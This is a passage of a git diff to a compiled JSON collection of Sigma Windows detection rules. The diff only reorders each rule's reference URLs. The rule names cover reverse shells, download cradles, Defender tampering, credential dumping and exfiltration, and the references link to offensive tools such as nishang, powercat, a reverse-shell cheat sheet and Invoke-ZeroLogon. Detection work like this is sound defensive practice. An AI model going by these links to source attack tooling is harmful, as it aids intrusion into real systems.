"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://ss64.com/nt/for.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" ], "tags": [ @@ -72389,8 +72563,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" ], "tags": [ @@ -72423,8 +72597,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.revshells.com/", "https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet", + "https://www.revshells.com/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ruby_inline_command_execution.yml" ], "tags": [ @@ -72556,9 +72730,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://twitter.com/fr0s7_/status/1712780207105404948", "https://h.43z.one/ipconverter/", - "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" ], "tags": [ @@ -72615,8 +72789,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://pentestlab.blog/tag/svchost/", + "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_query_interesting_services.yml" ], "tags": [ @@ -72648,9 +72822,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", + "https://github.com/swagkarna/Defeat-Defender-V1.2.0", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" ], "tags": [ @@ -72683,8 +72857,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", "https://kb.acronis.com/content/60892", + "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" ], @@ -72765,8 +72939,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://www.mandiant.com/resources/blog/infected-usb-steal-secrets", + "https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recycle_bin_fake_execution.yml" ], "tags": [ @@ -72790,10 +72964,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", - "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" ], "tags": [ @@ -72941,8 +73115,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://twitter.com/Oddvarmoe/status/1641712700605513729", + "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" ], "tags": [ @@ -72968,10 +73142,10 @@ "logsource.product": "windows", "refs": [ "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", - "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", + "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -73200,8 +73374,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" ], "tags": [ @@ -73250,8 +73424,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Kevin-Robertson/Inveigh", "https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/", + "https://github.com/Kevin-Robertson/Inveigh", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_inveigh.yml" ], "tags": [ @@ -73318,8 +73492,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.echotrail.io/insights/search/regsvr32.exe", "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", + "https://www.echotrail.io/insights/search/regsvr32.exe", "https://redcanary.com/blog/intelligence-insights-april-2022/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" ], @@ -73353,8 +73527,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_commands_and_processes.yml" ], "tags": [ @@ -73411,8 +73585,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", "https://thedfirreport.com/2021/12/13/diavol-ransomware/", + "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", "https://www.scythe.io/library/threat-emulation-qakbot", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" ], @@ -73436,8 +73610,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/shutdown", + "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1529/T1529.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shutdown_logoff.yml" ], "tags": [ @@ -73503,8 +73677,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", + "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" ], "tags": [ @@ -73605,12 +73779,12 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", - "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", + "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", + "https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://isc.sans.edu/diary/22264", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" ], "tags": [ @@ -73653,10 +73827,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", + "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ @@ -73697,8 +73871,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/", + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml" ], "tags": [ @@ -73766,8 +73940,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://asec.ahnlab.com/en/39828/", "https://twitter.com/GelosSnake/status/934900723426439170", + "https://asec.ahnlab.com/en/39828/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" ], "tags": [ @@ -73800,8 +73974,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", + "https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml" ], "tags": [ @@ -74026,9 +74200,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/bohops/status/994405551751815170", "https://redcanary.com/blog/lateral-movement-winrm-wmi/", "https://lolbas-project.github.io/lolbas/Scripts/Winrm/", - "https://twitter.com/bohops/status/994405551751815170", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" ], "tags": [ @@ -74085,8 +74259,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ @@ -74128,9 +74302,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml" ], "tags": [ @@ -74264,8 +74438,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", + "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" ], "tags": [ @@ -74510,10 +74684,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://youtu.be/5mqid-7zp8k?t=2481", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" ], "tags": [ @@ -74537,8 +74711,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ @@ -74892,8 +75066,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", + "https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml" ], "tags": [ @@ -74961,9 +75135,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922", - "https://github.com/grayhatkiller/SharpExShell", "https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication", + "https://github.com/grayhatkiller/SharpExShell", + "https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml" ], "tags": [ @@ -74996,9 +75170,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], "tags": [ @@ -75031,8 +75205,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/kmkz_security/status/1220694202301976576", "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", + "https://twitter.com/kmkz_security/status/1220694202301976576", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" ], "tags": [ @@ -75088,8 +75262,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml" ], "tags": [ @@ -75122,9 +75296,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", - "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://www.exploit-db.com/exploits/37525", + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", + "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], "tags": [ @@ -75241,8 +75415,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml", + "https://twitter.com/med0x2e/status/1520402518685200384", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ntlmrelay.yml" ], "tags": [ @@ -75527,10 +75701,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", - "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], @@ -75606,11 +75780,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", - "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", + "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", + "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" ], "tags": [ @@ -75788,9 +75962,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redcanary.com/blog/raspberry-robin/", "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/issues/1009", + "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" ], "tags": [ @@ -75980,8 +76154,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", + "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml" ], "tags": [ @@ -76117,8 +76291,8 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html", - "https://github.com/binderlabs/DirCreate2System", "https://www.echotrail.io/insights/search/wermgr.exe", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml" ], "tags": [ @@ -76183,8 +76357,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/", + "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/", "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml" ], @@ -76219,8 +76393,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/wsl/install-on-server", + "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps", "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml" ], @@ -76267,9 +76441,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", + "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml" ], "tags": [ @@ -76367,8 +76541,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OtherMSBinaries/Sqltoolsps.yml", + "https://twitter.com/pabraeken/status/993298228840992768", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml" ], "tags": [ @@ -76493,9 +76667,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", - "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", "https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/", + "https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176", + "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_driver_install.yml" ], "tags": [ @@ -76595,24 +76769,24 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/samratashok/nishang", - "https://github.com/DarkCoderSc/PowerRunAsSystem/", - "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", - "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", - "https://github.com/adrecon/ADRecon", "https://github.com/adrecon/AzureADRecon", - "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", - "https://github.com/Kevin-Robertson/Powermad", - "https://adsecurity.org/?p=2921", - "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", - "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", - "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", - "https://github.com/calebstewart/CVE-2021-1675", - "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", - "https://github.com/HarmJ0y/DAMP", - "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", - "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", "https://github.com/besimorhino/powercat", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/DarkCoderSc/PowerRunAsSystem/", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/calebstewart/CVE-2021-1675", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/samratashok/nishang", + "https://github.com/Kevin-Robertson/Powermad", + "https://github.com/HarmJ0y/DAMP", + "https://github.com/adrecon/ADRecon", + "https://adsecurity.org/?p=2921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml" ], "tags": [ @@ -76736,8 +76910,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583914244344799235", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", 